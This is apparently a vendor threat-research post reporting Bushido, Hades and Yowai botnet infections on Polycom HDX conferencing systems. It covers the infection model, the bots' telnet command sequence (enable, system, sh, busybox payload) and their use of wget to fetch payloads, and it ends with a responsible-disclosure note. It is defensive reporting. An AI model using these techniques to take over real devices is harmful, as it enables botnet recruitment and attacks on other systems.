Infections Die Hard Wootcloud Detects Polycom Hdx Systems Infected With Bushido Hades And Yowai Bots
The WootCloud Research team has a mission to help enterprises and security firms detect new threats that exist in the rapidly expanding IoT ecosystem. Over the past 12 months, we have identified and ethically disclosed multiple new threats, including the recent OMNI botnet attacking Polycom devices.
Our latest research uncovered the presence of three new botnet families on Polycom HDX systems, both mimicking the behavior of the Mirai botnet. WootCloud detected the infections in the Asia region. The malware families are of Bushido and Hades bots.
In late 2018, WootCloud worked in collaboration with the Polycom security team to unveil botnet infections affecting Polycom HDX systems, identifying an OMNI bot that was deployed in the wild on PolyCom HDX conference systems. Polycom also released an advisory to handle the OMNI bot infections. In this report, the WootCloud Research Team is highlighting additional exploits that attackers are still using in the wild to abuse these devices.
IOT Infection Model
The PolyCom HDX systems are used for launching attacks as shown below:
- The first step is for the attacker to detect vulnerable PolyCom systems on the Internet
- Vulnerable systems can be mapped as:
- Exposed on the Internet
- Configure with default settings and weak passwords
- Running multiple remote management interfaces such as Telnet, web, etc. with weak authorization and authentication controls
- Deployed with obsolete firmware prone to vulnerabilities
- Vulnerable systems can be mapped as:
- The attackers than scan the networks to obtain the available Polycom system on the Internet. The scans can be initiated using specific signatures to fingerprint the hosts running Polycom systems
- The attackers exploit the inherent vulnerability or configuration flaw to embed the malicious payload in the PolyCom system
- The attackers then utilize the embedded system utilities such as telnet, busybox, wget, etc. to perform unauthorized operations from the compromised PolyCom system
- The attackers then launch attacks such as DDoS, brute-force, password cracking and others to gain access to the other available systems.
- The primary motive of the attackers to build a pool of compromised hosts termed as bots to generate a network of bots that are operated by the attackers.
- The generated botnets can be used of nefarious activities on the Internet.
Let’s discuss briefly about the IoT bots in discussion here in the next section.
WootCloud started the analysis by targeting audio-video conferencing devices. During the investigation, we noted that Polycom’s audio-video conferencing systems are not only pervasive in the enterprise, but are frequently left running in insecure states, available to the Internet. Because of the role these devices in the enterprise, they are not usually considered in a typical security or risk scan. Unfortunately, in today’s environment, any exposed interfaces, unpatched embedded firmware, or unauthenticated service is a great target for malware that preys on embedded linux/unix systems.
To identify new exploits, WootCloud performed an in-depth analysis of the compromised Polycom HDX systems. Generally, these systems have a built-in debug interface that provides information about the activities occurred on the device in the log format. The debug flags have to be enabled in the configuration settings so that the device can log all the messages. Further, WootCloud performed log analysis and forensics on the infected machines to detect threats. A number of Polycom devices were found to be running the discovered bots (Bushido, Hades, and Yowai) which performed brute-force and password cracking operations from the device via telnet interface.
It has been noticed that the Polycom devices are shipped with binaries such as BusyBox, Wget, and others. Presence of these binaries on the device itself provides an attacker with a capability to launch operations stealthily without downloading additional binaries from the C&C server. In particular, these three bots extensively use the BusyBox, Wget, and other similar binaries for performing a different set of operations. WootCloud detected the use of these binaries by the bots to execute specific commands such as fetching malicious payloads from the remote locations using “wget” and then executing those payloads via “busybox”.
The brute-force attack execution by the bots bushido, hdes and yowai is discussed below:
Bushido infections were seen earlier in late 2018. The primary purpose of this botnet family is to generate a network of compromised IoT devices thereby using them as launchpads to trigger different set of attacks which include but not limited to: Distributed Denial of Service (DoS), brute-forcing accounts, exploiting vulnerabilities, and others. Bushido is evolved from the Mirai itself as it inherited a number of features and characteristics from the Mirai itself. Figure 1 shows the active brute-force attack launched from the compromised PolyCom HDX system by the Bushido IoT bot
The brute-force attack launched by bushidois detected via DEBUG logs generated from the compromised Polycom device. The attack is dissected below:
- The BUSHIDO bot triggers the “enable” command
- After that, “system” command is executed
- Once the “system” command is executed, the “sh” command is triggered to obtain the shell access rights so that specific payload can be executed
- After entering the shell with “sh”, The BUSHIDO bots call its main functions by loading the “/bin/busybox” with BUSHIDO payload as “/bin/busybox/ BUSHIDO”
If the DEBUG logs are dissected in detail, it can be noticed that the “appcom:ap_command”, “appcom:legacy_api_command”, “appcom:java_api_command” primarily belongs to the AVC binary.
Hades is another bot that works on the same paradigm. There has been a “Hades” ransomware release in the wild as well. In addition, “Hades” has also been associated with Advanced Persistent Threat (APT) group as well. From a technical perspective, this IoT bot is treated to be as the advanced version of the Mirai bot and expected to inherit some functionalities from the Mirai source code. Figure 2 shows the active brute-force attack launched from the compromised PolyCom HDX system by the Hades IoT bot.
Yowai is a Japanese word that means fragile or brittle. Yowai is also treated as variant of Mirai considering the characteristics and methods of infections. Figure 3 shows the active brute-force attack launched from the compromised PolyCom HDX system by the Yowai IoT bot
The log analysis and forensics performed on the compromised device highlights the presence of discovered bots (bushido, hades, yowai) infections on the Polycom HDX devices. The attackers are harnessing the power of open-source software packages such as “BusyBox”, WGet”, and others that are shipped with the embedded firmware of the Polycom devices. Compromised Polycom devices are used to launch brute-force attacks, potential DDoS attacks and also been used as proxy devices for routing malicious communications such as Command and Control (C&C). APIs supported by Polycom devices are abused by the attackers for performing unauthorized operations on the device.
Under the responsible disclosure guidelines, the findings have been reported to the Polycom Security team. Polycom has released the associated bulletin highlighting the best security practices to reduce the impact of Bushido/Hades bot and handling infections accordingly. The bulletin can be fetched at
- Security center
- Security bulletin
The WootCloud Research Team would like to extend a sincere thanks to the Polycom security team for their open collaboration on this bulletin and their rapid response to release clear guidelines for customers to detect and prevent these and future bot infections.